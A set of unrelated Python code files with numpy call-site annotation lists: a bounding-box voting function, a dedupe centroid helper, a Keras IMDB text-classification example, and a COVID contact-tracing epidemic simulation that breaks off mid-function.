inds_next = np.where(ovr <= IOU_thresh)[0]
order = order[inds_next]
keep_fusion_boxes = np.array(keep_fusion_boxes)
return keep_fusion_boxes
def box_voting(dets, IOU_thresh, score_thresh):
"""
greedily select boxes with high confidence and overlap with current maximum
and voting the final box coordinates by fusing those boxes
:param num_dets: dets after nms
:param dets: original detection results, dets before nms. [[x1, y1, x2, y2 score]]
:param IOU_thresh: retain overlap > IOU_thresh for fusion
:param score_thresh: retain score > score_thresh for fusion
:return: detection coordinates to keep
"""
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + 1) * (y2 - y1 + 1)
order = scores.argsort()[::-1]
if DEBUG:
print("dets ordered:", dets)
keep_fusion_boxes = []
while order.size > 0:
i = order[0]
xx1 = np.maximum(x1[i], x1[order])
yy1 = np.maximum(y1[i], y1[order])
xx2 = np.minimum(x2[i], x2[order])
yy2 = np.minimum(y2[i], y2[order])
# compute overlap
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
ovr = inter / (areas[i]+ areas[order] - inter)
# retain boxes with large overlap and high confidence for fusion
IOU_inds_keep = np.where(ovr > IOU_thresh)[0]
scores_inds_keep = np.where(scores[order] > score_thresh)[0]
if DEBUG:
print("IOU_inds_keep:", IOU_inds_keep)
print("scores_inds_keep:", scores_inds_keep)
if IOU_inds_keep.size == 0 or scores_inds_keep.size == 0: # if no box retained, keep the original one
keep_fusion_boxes.append(dets[i])
if DEBUG:
print("keep original det")
continue
inds_fusion = np.intersect1d(IOU_inds_keep, scores_inds_keep)
if DEBUG:
if inds_fusion.size>1:
print("boxes for fusion:", inds_fusion)
print(dets[order[inds_fusion]])
x1_fusion = x1[order[inds_fusion]]
y1_fusion = y1[order[inds_fusion]]
x2_fusion = x2[order[inds_fusion]]
y2_fusion = y2[order[inds_fusion]]
scores_fusion = scores[order[inds_fusion]]
fusion_box = np.zeros((1,5))
fusion_box[0][0] = np.sum(x1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][1] = np.sum(y1_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][2] = np.sum(x2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][3] = np.sum(y2_fusion * scores_fusion) / np.sum(scores_fusion)
fusion_box[0][4] = scores_fusion[0]
if DEBUG:
print("fusion_box:", fusion_box)
keep_fusion_boxes.append(fusion_box)
# boxes with small overlap are kept for another loop
inds_next = np.where(ovr <= IOU_thresh)[0]
order = order[inds_next]
keep_fusion_boxes = np.array(keep_fusion_boxes)
return keep_fusion_boxes
|
[
"numpy.minimum",
"numpy.maximum",
"numpy.sum",
"numpy.zeros",
"numpy.where",
"numpy.array",
"numpy.intersect1d"
] |
[((3374, 3401), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (3382, 3401), True, 'import numpy as np\n'), ((6324, 6351), 'numpy.array', 'np.array', (['keep_fusion_boxes'], {}), '(keep_fusion_boxes)\n', (6332, 6351), True, 'import numpy as np\n'), ((1285, 1318), 'numpy.maximum', 'np.maximum', (['nms_det[0]', 'x1[order]'], {}), '(nms_det[0], x1[order])\n', (1295, 1318), True, 'import numpy as np\n'), ((1333, 1366), 'numpy.maximum', 'np.maximum', (['nms_det[1]', 'y1[order]'], {}), '(nms_det[1], y1[order])\n', (1343, 1366), True, 'import numpy as np\n'), ((1381, 1414), 'numpy.minimum', 'np.minimum', (['nms_det[2]', 'x2[order]'], {}), '(nms_det[2], x2[order])\n', (1391, 1414), True, 'import numpy as np\n'), ((1429, 1462), 'numpy.minimum', 'np.minimum', (['nms_det[3]', 'y2[order]'], {}), '(nms_det[3], y2[order])\n', (1439, 1462), True, 'import numpy as np\n'), ((1502, 1532), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (1512, 1532), True, 'import numpy as np\n'), ((1545, 1575), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (1555, 1575), True, 'import numpy as np\n'), ((2004, 2051), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (2018, 2051), True, 'import numpy as np\n'), ((2711, 2722), 'numpy.zeros', 'np.zeros', (['(5)'], {}), '(5)\n', (2719, 2722), True, 'import numpy as np\n'), ((4257, 4285), 'numpy.maximum', 'np.maximum', (['x1[i]', 'x1[order]'], {}), '(x1[i], x1[order])\n', (4267, 4285), True, 'import numpy as np\n'), ((4300, 4328), 'numpy.maximum', 'np.maximum', (['y1[i]', 'y1[order]'], {}), '(y1[i], y1[order])\n', (4310, 4328), True, 'import numpy as np\n'), ((4343, 4371), 'numpy.minimum', 'np.minimum', (['x2[i]', 'x2[order]'], {}), '(x2[i], x2[order])\n', (4353, 4371), True, 'import numpy as np\n'), ((4386, 4414), 'numpy.minimum', 'np.minimum', (['y2[i]', 'y2[order]'], {}), '(y2[i], y2[order])\n', (4396, 4414), True, 'import numpy as np\n'), ((4454, 4484), 'numpy.maximum', 'np.maximum', (['(0.0)', '(xx2 - xx1 + 1)'], {}), '(0.0, xx2 - xx1 + 1)\n', (4464, 4484), True, 'import numpy as np\n'), ((4497, 4527), 'numpy.maximum', 'np.maximum', (['(0.0)', '(yy2 - yy1 + 1)'], {}), '(0.0, yy2 - yy1 + 1)\n', (4507, 4527), True, 'import numpy as np\n'), ((5194, 5241), 'numpy.intersect1d', 'np.intersect1d', (['IOU_inds_keep', 'scores_inds_keep'], {}), '(IOU_inds_keep, scores_inds_keep)\n', (5208, 5241), True, 'import numpy as np\n'), ((5644, 5660), 'numpy.zeros', 'np.zeros', (['(1, 5)'], {}), '((1, 5))\n', (5652, 5660), True, 'import numpy as np\n'), ((1756, 1782), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (1764, 1782), True, 'import numpy as np\n'), ((1813, 1851), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (1821, 1851), True, 'import numpy as np\n'), ((2749, 2782), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (2755, 2782), True, 'import numpy as np\n'), ((2785, 2806), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2791, 2806), True, 'import numpy as np\n'), ((2831, 2864), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (2837, 2864), True, 'import numpy as np\n'), ((2867, 2888), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2873, 2888), True, 'import numpy as np\n'), ((2913, 2946), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (2919, 2946), True, 'import numpy as np\n'), ((2949, 2970), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (2955, 2970), True, 'import numpy as np\n'), ((2995, 3028), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (3001, 3028), True, 'import numpy as np\n'), ((3031, 3052), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (3037, 3052), True, 'import numpy as np\n'), ((3285, 3312), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (3293, 3312), True, 'import numpy as np\n'), ((4703, 4729), 'numpy.where', 'np.where', (['(ovr > IOU_thresh)'], {}), '(ovr > IOU_thresh)\n', (4711, 4729), True, 'import numpy as np\n'), ((4760, 4798), 'numpy.where', 'np.where', (['(scores[order] > score_thresh)'], {}), '(scores[order] > score_thresh)\n', (4768, 4798), True, 'import numpy as np\n'), ((5687, 5720), 'numpy.sum', 'np.sum', (['(x1_fusion * scores_fusion)'], {}), '(x1_fusion * scores_fusion)\n', (5693, 5720), True, 'import numpy as np\n'), ((5723, 5744), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5729, 5744), True, 'import numpy as np\n'), ((5772, 5805), 'numpy.sum', 'np.sum', (['(y1_fusion * scores_fusion)'], {}), '(y1_fusion * scores_fusion)\n', (5778, 5805), True, 'import numpy as np\n'), ((5808, 5829), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5814, 5829), True, 'import numpy as np\n'), ((5857, 5890), 'numpy.sum', 'np.sum', (['(x2_fusion * scores_fusion)'], {}), '(x2_fusion * scores_fusion)\n', (5863, 5890), True, 'import numpy as np\n'), ((5893, 5914), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5899, 5914), True, 'import numpy as np\n'), ((5942, 5975), 'numpy.sum', 'np.sum', (['(y2_fusion * scores_fusion)'], {}), '(y2_fusion * scores_fusion)\n', (5948, 5975), True, 'import numpy as np\n'), ((5978, 5999), 'numpy.sum', 'np.sum', (['scores_fusion'], {}), '(scores_fusion)\n', (5984, 5999), True, 'import numpy as np\n'), ((6235, 6262), 'numpy.where', 'np.where', (['(ovr <= IOU_thresh)'], {}), '(ovr <= IOU_thresh)\n', (6243, 6262), True, 'import numpy as np\n')]
|
import numpy
from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator
def getCentroid(attribute_variants, comparator):
"""
Takes in a list of attribute values for a field,
evaluates the centroid using the comparator,
& returns the centroid (i.e. the 'best' value for the field)
"""
n = len(attribute_variants)
distance_matrix = numpy.zeros([n,n])
# populate distance matrix by looping through elements of matrix triangle
for i in range (0,n):
for j in range (0, i):
distance = comparator(attribute_variants[i], attribute_variants[j])
distance_matrix[i,j] = distance_matrix[j,i] = distance
average_distance = distance_matrix.mean(0)
# there can be ties for minimum, average distance string
min_dist_indices = numpy.where(average_distance==average_distance.min())[0]
if len(min_dist_indices) > 1:
centroid = breakCentroidTie(attribute_variants, min_dist_indices)
else :
centroid_index = min_dist_indices[0]
centroid = attribute_variants[centroid_index]
return centroid
def breakCentroidTie(attribute_variants, min_dist_indices):
"""
Finds centroid when there are multiple values w/ min avg distance
(e.g. any dupe cluster of 2) right now this selects the first among a set of
ties, but can be modified to break ties in strings by selecting the longest string
"""
return attribute_variants[min_dist_indices[0]]
def getCanonicalRep(record_cluster):
"""
Given a list of records within a duplicate cluster, constructs a canonical representation
of the cluster by finding canonical values for each field
"""
canonical_rep = {}
for key in record_cluster[0].keys():
key_values = []
for record in record_cluster :
# assume non-empty values always better than empty value for canonical record
if record[key]:
key_values.append(record[key])
if key_values:
canonical_rep[key] = getCentroid(key_values, comparator)
else:
canonical_rep[key] = ''
return canonical_rep
|
[
"dedupe.distance.affinegap.normalizedAffineGapDistance",
"numpy.zeros"
] |
[((391, 410), 'numpy.zeros', 'numpy.zeros', (['[n, n]'], {}), '([n, n])\n', (402, 410), False, 'import numpy\n'), ((573, 629), 'dedupe.distance.affinegap.normalizedAffineGapDistance', 'comparator', (['attribute_variants[i]', 'attribute_variants[j]'], {}), '(attribute_variants[i], attribute_variants[j])\n', (583, 629), True, 'from dedupe.distance.affinegap import normalizedAffineGapDistance as comparator\n')]
|
'''This example demonstrates the use of Convolution1D for text classification.
Gets to 0.89 test accuracy after 2 epochs.
90s/epoch on Intel i5 2.4Ghz CPU.
10s/epoch on Tesla K40 GPU.
'''
from __future__ import print_function
import numpy as np
import keras.callbacks
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Embedding
from keras.layers import Conv1D, GlobalMaxPooling1D
from keras.datasets import imdb
from example_correctness_test_utils import TrainingHistory, StopwatchManager
# set parameters:
max_features = 5000
maxlen = 400
batch_size = 32
embedding_dims = 50
filters = 250
kernel_size = 3
hidden_dims = 250
epochs = 2
print('Loading data...')
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=max_features)
train_input_truncation = 1500
test_input_truncation = 200
x_train = x_train[:train_input_truncation]
y_train = y_train[:train_input_truncation]
x_test = x_test[:test_input_truncation]
y_test = y_test[:test_input_truncation]
print(len(x_train), 'train sequences')
print(len(x_test), 'test sequences')
print('Pad sequences (samples x time)')
x_train = sequence.pad_sequences(x_train, maxlen=maxlen)
x_test = sequence.pad_sequences(x_test, maxlen=maxlen)
print('x_train shape:', x_train.shape)
print('x_test shape:', x_test.shape)
print('Build model...')
model = Sequential()
# we start off with an efficient embedding layer which maps
# our vocab indices into embedding_dims dimensions
model.add(Embedding(max_features, embedding_dims, input_length=maxlen))
model.add(Dropout(0.2))
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
model.add(Conv1D(filters, kernel_size, padding='valid', activation='relu', strides=1))
# we use max pooling:
model.add(GlobalMaxPooling1D())
# We add a vanilla hidden layer:
model.add(Dense(hidden_dims))
model.add(Dropout(0.2))
model.add(Activation('relu'))
# We project onto a single unit output layer, and squash it with a sigmoid:
model.add(Dense(1))
model.add(Activation('sigmoid'))
history = TrainingHistory()
sw_manager = StopwatchManager(stop_watch, compile_stop_watch)
model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
model.fit(x_train,
y_train,
batch_size=batch_size,
epochs=epochs,
validation_data=(x_test, y_test),
callbacks=[history, sw_manager])
output.contents = np.array([history.acc, history.loss, history.val_acc, history.val_loss])
|
[
"example_correctness_test_utils.TrainingHistory",
"keras.layers.Activation",
"keras.preprocessing.sequence.pad_sequences",
"keras.layers.Dropout",
"keras.layers.Conv1D",
"example_correctness_test_utils.StopwatchManager",
"keras.layers.Dense",
"numpy.array",
"keras.layers.Embedding",
"keras.models.Sequential",
"keras.layers.GlobalMaxPooling1D",
"keras.datasets.imdb.load_data"
] |
[((809, 847), 'keras.datasets.imdb.load_data', 'imdb.load_data', ([], {'num_words': 'max_features'}), '(num_words=max_features)\n', (823, 847), False, 'from keras.datasets import imdb\n'), ((1201, 1247), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_train'], {'maxlen': 'maxlen'}), '(x_train, maxlen=maxlen)\n', (1223, 1247), False, 'from keras.preprocessing import sequence\n'), ((1257, 1302), 'keras.preprocessing.sequence.pad_sequences', 'sequence.pad_sequences', (['x_test'], {'maxlen': 'maxlen'}), '(x_test, maxlen=maxlen)\n', (1279, 1302), False, 'from keras.preprocessing import sequence\n'), ((1412, 1424), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1422, 1424), False, 'from keras.models import Sequential\n'), ((2129, 2146), 'example_correctness_test_utils.TrainingHistory', 'TrainingHistory', ([], {}), '()\n', (2144, 2146), False, 'from example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2160, 2208), 'example_correctness_test_utils.StopwatchManager', 'StopwatchManager', (['stop_watch', 'compile_stop_watch'], {}), '(stop_watch, compile_stop_watch)\n', (2176, 2208), False, 'from example_correctness_test_utils import TrainingHistory, StopwatchManager\n'), ((2494, 2566), 'numpy.array', 'np.array', (['[history.acc, history.loss, history.val_acc, history.val_loss]'], {}), '([history.acc, history.loss, history.val_acc, history.val_loss])\n', (2502, 2566), True, 'import numpy as np\n'), ((1547, 1607), 'keras.layers.Embedding', 'Embedding', (['max_features', 'embedding_dims'], {'input_length': 'maxlen'}), '(max_features, embedding_dims, input_length=maxlen)\n', (1556, 1607), False, 'from keras.layers import Embedding\n'), ((1619, 1631), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1626, 1631), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1739, 1814), 'keras.layers.Conv1D', 'Conv1D', (['filters', 'kernel_size'], {'padding': '"""valid"""', 'activation': '"""relu"""', 'strides': '(1)'}), "(filters, kernel_size, padding='valid', activation='relu', strides=1)\n", (1745, 1814), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1848, 1868), 'keras.layers.GlobalMaxPooling1D', 'GlobalMaxPooling1D', ([], {}), '()\n', (1866, 1868), False, 'from keras.layers import Conv1D, GlobalMaxPooling1D\n'), ((1914, 1932), 'keras.layers.Dense', 'Dense', (['hidden_dims'], {}), '(hidden_dims)\n', (1919, 1932), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1944, 1956), 'keras.layers.Dropout', 'Dropout', (['(0.2)'], {}), '(0.2)\n', (1951, 1956), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((1968, 1986), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (1978, 1986), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2075, 2083), 'keras.layers.Dense', 'Dense', (['(1)'], {}), '(1)\n', (2080, 2083), False, 'from keras.layers import Dense, Dropout, Activation\n'), ((2095, 2116), 'keras.layers.Activation', 'Activation', (['"""sigmoid"""'], {}), "('sigmoid')\n", (2105, 2116), False, 'from keras.layers import Dense, Dropout, Activation\n')]
|
from IPython import get_ipython
# %%
####################
# GRAPH GENERATION #
####################
# TODO: remove duplicate of nbIndividuals in viz
nbIndividuals = 1000 # number of people in the graph | nombre d'individus dans le graphe
initHealthy = 0.85 # proportion of healthy people at start | la proportion de personnes saines à l'intant initial
initCured = 0.1 # proportion of cured people at start | proportion de personnes guéries à l'instant initial
# The other people are 60% presymptomatic and 40% asymptomatic at start | Les autres personnes sont 40% d'asymptomatiques et 60% de présymptomatiques au départ
# graph generation for exponential degrees distribution
#------------------------------------------------------
deg_avg = 100 # average number of connexions per person | le nombre moyen de connexions par personne
av_household_size = 6 # average size of household | la taille moyenne d'un foyer
household_proba = 1 # probability of meeting a person of the same household | la probabilité de contact par jour entre membres d'un même foyer
extern_contact_proba = 0.3 # probabilty of meeting a person of a different household | la probabilité de contact par jour entre personne de foyers différents
# average contacts per day = 0.3*(100-6) + 1*6 = 34.2
# graph generation with organization in households
#-------------------------------------------------
household_size = (3, 5) # min and max size of an household (uniform distribution) | extremums de la taille d'un foyer
household_link = 1 # probability of contact between members of a household | proba de contact entre membres d'un foyer
number_of_households = 300 # 2500 is good but a bit slow | number of households in the community | nombre de foyers dans une communauté
community_link = 0.3 # probability of contact across households | proba de contact entre foyers
av_deg_by_household = 400 # number of link from a household | nombre moyen de liens depuis un foyer
# average external degree of an individual : 400/4 (4 is the average size of an household)
# average contacts per day = (400/4)*0.3 + 4 = 34
##############
# APP PARAMS #
##############
daysNotif = 0 # number of days the app checks back for contact notification | nombre de jours vérifiés par l'appli pour notifier un contact
utilApp = 0.8 # percentage of people having the app | la proportion d'utilisateurs de l'application dans la population générale
pDetection = 0.9 # prob. that the app detects a contact | proba que l'appli détecte un contact
pReport = 0.9 # prob. that a user reports his symptoms | proba qu'un utilisateur alerte de ses symptômes
pReadNotif = 0.8 # probablity of taking a notification into account (ask for a test, quarantine) | proba de prendre en compte une notification (demande de test, quarantaine)
pSymptomsNotCovid = 0.005 # every day, everyone sends a notification with prob. pSymptomsNotCovid | chaque jour, tout le monde envoie une notif avec proba PSymptomsNotCovid
############
# POLICIES #
############
# people warn the app immediately after having symptoms | on prévient l'application directement après avoir développé les symptômes
warningAfterSymptoms = False
# upon notification, an individual asks for a test (with some prob.)
# if true, user waits for test results in quarantine, else he goes in quarantine only upon reception of positive test results
# |
# à la reception d'une notif, l'utilisateur demande un test (avec une certaine proba)
# si vrai, il attend les résultats en quarantaine, sinon il ne se met en quarantaine qu'aux résultats d'un test positif
quarantineAfterNotification = True
###############
# TEST PARAMS #
###############
testWindow = (3, 10) # tests are only effective in a given window (time since infection) | les tests ne sont efficaces que dans une fenêtre de temps après infection
daysUntilResult = 2 # attente pour l'obtention des résultats
pFalseNegative = 0.15 # prob. of false negative | proba d'avoir un faux négatif
daysBetweenTests = 0
##############
# QUARANTINE #
##############
pQSymptoms = 0.9 # probability of going into quarantine when one has symptoms | proba de confinement lors de détection des symptômes
quarantineFactor = 100 # reduction factor applied to the probabilities when one is in quarantine | réduction des probas de rencontre lors du confinement
daysQuarantine = 14 # duration of the quarantine | durée de la quarantaine
#################
# PROBABILITIES #
#################
# !! Probabilities are given for 1 step of the process, thus overall prob. follows a geometric law for which expected values have been calculated
# paramters estimated -> a limit of the model
pCloseContact = 0.375 # prob. that a contact is a close contact (those detected by the app) | proba qu'un contact soit rapproché (ceux détectés par l'appli)
pContaminationCloseContact = 0.02 # prob. of contamination after close contact with an infected person | proba de contamination après contact rapproché avec qqn d'infecté
#according to https://www.who.int/docs/default-source/coronaviruse/who-china-joint-mission-on-covid-19-final-report.pdf -> around 1 to 5% of close contact lead to virus transmission
pContaminationCloseContactAsymp = 0.006
# infectiousness of asymptomatic people appears to be very low according to [4] and "Temporal dynamics in viral shedding and transmissibility of COVID-19" [6]
pContaminationFar = 0.001 # prob. of contamination upon non close contact (environmental or short contact) | proba de contamination par contact environnemental ou bref
pContaminationFarAsymp = 0.0003
# we took R0=2 estimate from [4] and : 34 contacts/day, an average time of infectiousness of 10 days (pre symptomatic + begining of symptoms period)
#average number of infected by symptomatic : (0.375*0.02+0.625*0.001)*34*10 = 2.76
#average number of infected by asymptomatic : (0.375*0.006+0.625*0.0003)*34*10 = 0.83
# this gives 0.6*2.76 + 0.4*0.83 = 1.99 persons infected in average by an infected
# this is plausible given the estimate of R0 and the fact that asymptomatic contamination appears to be minor
# [4] and [6]
# and (0.6*0.625*0.001 + 0.4*0.625*0.0003)*34*10 / R0 = 0.0765 -> the proportion of contaminations which are not due to close contact (environmental / short contact) (contaminations by asymptomatic people are neglected) estimated according to environmental contamination estimate in [4]
# thus most infections (92%) are susceptible to be noticed by the app
# -> the proportion of contaminations by asympt. people is : 0.4*0.83/(0.6*2.76 + 0.4*0.0.83) = 0.17 plausible according to the presumed low infectiosity shown in [4], but this is a conservative estimate (not the 0.06 given by this paper) given the high uncertainty around the results
pAsympt = 0.4 # probability of being asymptomatic when infected | proba qu'une personne infectée soit asymptomatique
# according to [4] and Diamond Princess estimates
# parameters for the lognormal law of the incubation period | paramètres pour la loi lognormale de la période d'incubation
incubMeanlog = 1.644 # -> ~5.5 days
incubSdlog = 0.363 # -> ~2.1 days
# according to [4]
pAtoG = 0.1 # probability of going from asymptomatic state to cured | proba de passer de asymptomatique à guéri
# according to "Clinical characteristics of 24 asymptomatic infections with COVID-19 screened among close contacts in Nanjing, China" [7]
pIStoC = 0.07 # probability of going from symptomatic state to cured | proba de passer de avec symptômes à gueri
pIStoD = 0.003 # probability of dying when symptomatic | proba de décès d'une personne présentant des symptômes
# average time with symptoms : 1/(0.07+0.003) = 13.7 days : plausible according to [4]
# death rate when symptoms : 0.003/0.07 = 4.3% : plausible in France according to estimate of 1.6M cases with symptoms and 6 000 deaths the 3 April
# https://www.mgfrance.org/publication/communiquepresse/2525-enquete-mg-france-plus-d-un-million-et-demi-de-personnes-prises-en-charge-par-leur-medecin-generaliste-pour-le-covid-19-entre-le-17-mars-et-le-3-avril
# # Libs and defs
# Librairies
import random
import numpy as np
# -> sliders
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
HEALTHY = 0
ASYMP = 1
PRESYMP = 2
SYMP = 3
CURED = 4
DEAD = 5
class Graph:
""" Object holding the representation of the graph and some metrics """
def __init__(self):
self.individuals = []
self.adj = []
self.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)]
self.nbHealthy = 0 # number of healthy people
self.nbAS = 0 # number of asymptomatic people
self.nbPS = 0 # number of premptomatic people
self.nbS = 0 # number of symptomatic people
self.nbCured = 0 # number of cured persons
self.nbDead = 0 # number of deceased people
self.nbQuarantineI = 0 # number of infected people in quarantine
self.nbQuarantineNonI = 0 # number of non infected people in quarantine
self.nbTest = 0 # number of tests made
# cumulative counters :
self.nbQuarantineTotal = 0 # number of people in quarantine
self.nbInfectedByASPS = 0 # number of people infected by asymp. + presymp. people
#to compute Rt
self.stepNb = 0
self.contaminations = [] # number of people contaminated at a given time
self.numInfectedByNewInfected = [] # total number of people who will get infected by people contaminated at a given time
class Individual:
""" Object holding the representation of an individual """
def __init__(self, state, daysQuarantine, app, sentNotification, daysIncubation, timeSinceInfection, timeLeftForTestResult):
self.state = state
self.daysQuarantine = daysQuarantine
self.app = app
self.sentNotification = sentNotification
self.daysIncubation = daysIncubation
self.timeSinceInfection = timeSinceInfection
self.timeSinceLastTest = np.inf # we don't want to test people too often
self.timeLeftForTestResult = timeLeftForTestResult
self.nbInfected = 0
def in_state(self, state):
return self.state == state
def is_infected(self):
return self.state in [PRESYMP, ASYMP, SYMP]
def has_no_covid(self):
return self.state in [HEALTHY, CURED]
def in_quarantine(self):
return self.daysQuarantine > 0
def go_quarantine(self):
if self.daysQuarantine <= 0:
self.daysQuarantine = daysQuarantine # goes into quarantine if isn't already
# # Graph generation
def create_individuals(graph):
graph.contaminations.append(0)
for i in range(nbIndividuals):
app = False
if random.uniform(0,1) < utilApp:
app = True
s = PRESYMP
time_since_infection = -1
incub = 0
r = random.random()
if r < initHealthy:
s = HEALTHY
graph.nbHealthy += 1
elif r < initHealthy + initCured:
s = CURED
graph.nbCured += 1
else:
graph.contaminations[0] += 1 # we start as if a proportion of the population just got infected
time_since_infection = 0
if random.random() < pAsympt:
s = ASYMP
graph.nbAS += 1
else:
s = PRESYMP
incub = round(np.random.lognormal(incubMeanlog, incubSdlog))
graph.nbPS += 1
# state, quarantine, app, notif, incubation, timeSinceInfection, timeLeftForTestResult
graph.individuals.append(Individual(s, 0, app, False, incub, time_since_infection, -1))
def init_graph_exp(graph):
""" Graph initialisation based on exponential ditribution of degrees """
create_individuals(graph)
# affecting degrees to vertices
degrees = np.around(np.random.exponential(deg_avg, nbIndividuals))
# to get an even number of total degrees
S = sum(degrees)
if S%2 == 1:
degrees[0] += 1
S += 1
graph.adj = [[] for i in range(nbIndividuals)]
while S > 0:
# creating an edge
[p1, p2] = np.random.choice(len(degrees), 2, replace=False, p=degrees/S)
if degrees[p1] <= av_household_size or degrees[p2] <= av_household_size:
# the last edges created are edges within households
graph.adj[p1].append({"node" : p2, "proba" : household_proba})
graph.adj[p2].append({"node" : p1, "proba" : household_proba})
else:
graph.adj[p1].append({"node" : p2, "proba" : extern_contact_proba})
graph.adj[p2].append({"node" : p1, "proba" : extern_contact_proba})
degrees[p1] -= 1
degrees[p2] -= 1
S -= 2
def init_graph_household(graph):
""" Graph generation based on households organisation """
global nbIndividuals
# creation of the households
graph.adj = []
for i in range(number_of_households):
size = random.randint(household_size[0], household_size[1])
nb = len(graph.adj)
for i in range(nb, nb+size):
household = []
for j in range(nb, nb+size):
if (i != j):
household.append({"node": j, "proba": household_link})
graph.adj.append(household)
# linkage of the households
for i in range(av_deg_by_household*number_of_households):
[p1, p2] = np.random.choice(len(graph.adj), 2, replace=False)
graph.adj[p1].append({"node": p2, "proba": community_link})
graph.adj[p2].append({"node": p1, "proba": community_link})
nbIndividuals = len(graph.adj)
create_individuals(graph)
graph.encounters = [[[] for day in range(daysNotif)] for individual in range(nbIndividuals)]
# # Updating the graph
def contamination(graph, i, j, closeContact):
""" Individuals i and j have come into contact, leading to a possible contamination | Les individus i et j sont entrés en contact, une contamination est possible """
if graph.individuals[i].state == graph.individuals[j].state:
return
if graph.individuals[i].in_state(HEALTHY):
contamination(graph, j, i, closeContact)
return
# i is the infected individual
if graph.individuals[i].is_infected():
if graph.individuals[j].in_state(HEALTHY):
if closeContact:
pContamination = pContaminationCloseContact
pContaminationAsymp = pContaminationCloseContactAsymp
else:
pContamination = pContaminationFar
pContaminationAsymp = pContaminationFarAsymp
if (random.random() < pContamination and (not graph.individuals[i].in_state(ASYMP))) or \
(random.random() < pContaminationAsymp and graph.individuals[i].in_state(ASYMP)):
# j becomes infected
# for Rt computation
graph.contaminations[graph.stepNb] += 1
graph.numInfectedByNewInfected[graph.stepNb - graph.individuals[i].timeSinceInfection] += 1 # parent infection took place timeSinceInfection ago
if graph.individuals[i].in_state(ASYMP) or graph.individuals[i].in_state(PRESYMP):
graph.nbInfectedByASPS += 1
graph.individuals[j].timeSinceInfection = 0
graph.individuals[i].nbInfected += 1 # i has infected one more person
graph.nbHealthy -= 1
if random.random() < pAsympt:
graph.individuals[j].state = ASYMP
graph.nbAS += 1
else:
graph.individuals[j].state = PRESYMP
graph.individuals[j].daysIncubation = round(np.random.lognormal(incubMeanlog, incubSdlog))
graph.nbPS += 1
def test_individual(individual, graph):
# if there is a test incoming, the person is not tested again
if individual.timeLeftForTestResult >= 0 or individual.in_state(DEAD):
return
# the person was tested not long ago
if individual.timeSinceLastTest < daysBetweenTests:
return
# the person is tested
individual.timeSinceLastTest = 0
graph.nbTest += 1
individual.timeLeftForTestResult = daysUntilResult
if individual.has_no_covid():
individual.latestTestResult = False # we assume that there are no false positives
return
if individual.timeSinceInfection < testWindow[0] or individual.timeSinceInfection > testWindow[1]:
individual.latestTestResult = False # not in the detection window, the test fails
return
# otherwise the person is ill
# the test result depends whether we have a false negative or not
individual.latestTestResult = not (random.random() < pFalseNegative)
def send_notification(graph, i):
""" Send notification to people who have been in touch with i | Envoi d'une notif aux personnes ayant été en contact avec i """
if graph.individuals[i].sentNotification:
return # notifications already sent
graph.individuals[i].sentNotification = True
for daysEncounter in graph.encounters[i]:
# note: graph.encounter[i] is empty if i does not have the app so there is no need to have an additional condition
for contact in daysEncounter:
if random.random() < pReadNotif: # if the person takes the notification into account
# the person is always tested (TODO: change this ?)
test_individual(graph.individuals[contact], graph) # asks for a test
if quarantineAfterNotification: # in this case, the person waits for test results in quarantine
graph.individuals[contact].go_quarantine()
def make_encounters(graph, i):
